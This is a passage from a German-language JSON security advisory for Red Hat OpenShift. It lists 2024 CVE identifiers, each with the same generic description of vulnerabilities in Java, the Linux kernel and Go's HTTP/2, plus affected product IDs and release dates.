"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-21011"
},
{
"cve": "CVE-2024-21012",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-21012"
},
{
"cve": "CVE-2024-21068",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-21068"
},
{
"cve": "CVE-2024-21085",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-21085"
},
{
"cve": "CVE-2024-21094",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-21094"
},
{
"cve": "CVE-2024-22365",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-22365"
},
{
"cve": "CVE-2024-24783",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-24783"
},
{
"cve": "CVE-2024-24784",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-24784"
},
{
"cve": "CVE-2024-24785",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-24785"
},
{
"cve": "CVE-2024-24786",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-24786"
},
{
"cve": "CVE-2024-25062",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-25062"
},
{
"cve": "CVE-2024-25742",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-25742"
},
{
"cve": "CVE-2024-25743",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-25743"
},
{
"cve": "CVE-2024-26582",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-26582"
},
{
"cve": "CVE-2024-26583",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-26583"
},
{
"cve": "CVE-2024-26584",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-26584"
},
{
"cve": "CVE-2024-26585",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-26585"
},
{
"cve": "CVE-2024-26586",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-26586"
},
{
"cve": "CVE-2024-26593",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-26593"
},
{
"cve": "CVE-2024-26602",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-26602"
},
{
"cve": "CVE-2024-26609",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-26609"
},
{
"cve": "CVE-2024-26633",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-26633"
},
{
"cve": "CVE-2024-27316",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-27316"
},
{
"cve": "CVE-2024-28834",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-28834"
},
{
"cve": "CVE-2024-28835",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-28835"
},
{
"cve": "CVE-2024-28849",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-28849"
},
{
"cve": "CVE-2024-29180",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-29180"
},
{
"cve": "CVE-2024-2961",
"notes": [
{
"category": "description",
